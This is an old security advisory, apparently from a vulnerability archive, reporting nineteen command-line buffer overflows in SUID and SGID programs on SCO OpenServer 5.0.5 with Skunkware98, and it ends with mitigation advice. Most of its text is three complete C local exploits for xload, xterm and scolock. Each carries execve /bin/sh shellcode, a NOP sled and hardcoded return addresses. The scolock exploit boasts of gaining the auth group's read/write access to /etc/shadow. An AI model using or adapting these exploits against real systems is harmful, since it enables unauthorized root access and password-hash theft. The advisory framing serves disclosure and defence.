COMMAND
buffer overflows
SYSTEMS AFFECTED
SCO 5.0.5+Skunware98
PROBLEM
Brock Tellier found following. After some light security auditing
he found approximately nineteen buffer overflows in various SCO
5.0.5+Skunkware98 programs. This was, by no means, a
comprehensive audit of SCO's su/gids so we can be sure there are
dozens of holes missed. Keep in mind also that this was ONLY
command line buffer overflow testing and did not include
environment, file i/o, or any other sort of overflow. And no
/tmp races looking around.
Some of these holes are old to the world of security, but
apparently SCO hasn't caught up yet. For instance, anyone
remember the old Xt library holes in xterm and such? Well,
apparently SCO doesn't. Not to mention the fact that in June
someone posted an xterm exploit (though the author didn't make
clear that all programs using the Xt library were probably
vulnerable) and SCO never came out with a fix. Thus this program
as well as all others in the class are still vulnerable.
Following is a list of vulnerable programs and their su/gid
status.
Potential root:
SUID root
1. xload -bg $1492bytes
2. xterm -bg $1492bytes
3. xmcd -bg $1492bytes
Exploit for xload follows (however, it won't work):
/*
* <xloadx.c> Local root exploit
*
* Offset: xload (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 2000 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc xloadx.c -o xloadx
* $ scoterm
* $ /usr/bin/X11/xload -geometry `xloadx 0`
* or
* $ /usr/bin/X11/xload -display 1.1.1.1:0 -geometry `xloadx 2000`
*
* Note: xload need to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80462ff // SCO OpenServer 5.0.4
#define ALINEA 3
#define LEN 2000
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc < 2) {
printf("Usage: xloadx <offset>\n");
exit(0); }
else {
offset=atoi(argv[1]); }
memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;
for(i=0;i<LEN;i++)
putchar(buf[i]);
exit(0);
}
Here's for xterm:
/*
* <xtermx.c> Local root exploit
*
* Offset: xterm (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 0 -> Openserver 5.0.2 (with display parameter)
* 2000 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc xtermx.c -o xtermx
* $ scoterm
* $ /usr/bin/X11/xterm -bg `xtermx 0`
* or
* $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000`
*
* Note: xterm need to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80471ff // SCO OpenServer 5.0.4
#define ALINEA 0
#define LEN 2000
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc < 2) {
printf("Usage: xtermx <offset>\n");
exit(0); }
else {
offset=atoi(argv[1]); }
memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;
for(i=0;i<LEN;i++)
putchar(buf[i]);
exit(0);
}
SUID auth (Auth has rw access to /etc/shadow)
4. xlock -bg $1492bytes
5. xscreensaver -bg $1492bytes
6. scolock -bg $1492bytes
Now, here's the scolock exploit:
/*
* <scolockx.c> Local exploit - Gives you an auth group suid shell
*
* h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!)
*
* $ ls -al /etc/shadow
* -rw-rw---- 1 root auth 323 Jun 14 23:09 /etc/shadow
*
* Offset: scolockx (SCO OpenServer 5.0.4)
* 0 -> with -display parameter
*
* Usage:
* $ cc scolockx.c -o scolockx
* $ /usr/bin/X11/scolock -display 1.1.1.1:0 -bg `scolockx 0`
*
* Note: scolock need to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
char hell[]=
"\xeb\x16" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x53" // pushl %ebx
"\x53" // pushl %ebx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe5\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
#define OFF 0x8047a98 // SCO OpenServer 5.0.4
#define ALINEA 0
#define LEN 2000
int main(int argc, char *argv[]) {
int offset=0;
char buf[LEN];
int i;
if(argc < 2) {
printf("Usage: scolockx <offset>\n");
exit(0); }
else {
offset=atoi(argv[1]); }
memset(buf,0x90,LEN);
memcpy(buf+1000,hell,strlen(hell));
for(i=1100+ALINEA;i<LEN-4;i+=4)
*(int *)&buf[i]=OFF+offset;
for(i=0;i<LEN;i++)
putchar(buf[i]);
exit(0);
}
SUID mem (strings /dev/kmem)
7. sar -o $2105bytes or sar -f $1077bytes x
Potential lp:
SUID lp
8. cancel $998bytes (isn't this one old too?)
9. lp $10000bytes (didn't get the exact number)
10. reject $10000bytes (as above)
Potential bin:
SUID bin
11. sd $1017bytes (SIGSEGV @1017 SIGTERM 1 to 1017bytes)
Potential annoyance:
SUID dos
12. doscat $19031bytes
13. doscp "" x
14. dosdir ""
15. dosls ""
16. dosmkdir ""
17. dosrm ""
18. dosrmdir ""
SUID uucp
19. ati $40bytes
SOLUTION
For most of these programs, you're going to have to suffer with
some broken functionality when you remove the s-bits. The various
suid root and auth won't be able to function without their su/gid
status. However you could make a new group such as xusers and
have these programs only executable by its members. In fact
adding trusted users to the lp group is probably the best way to
overcome these lp vulnerabilities as well.
SCO will have a patch for OpenServer 5.0.5 in two weeks, which
will be available from
http://www.sco.com/security/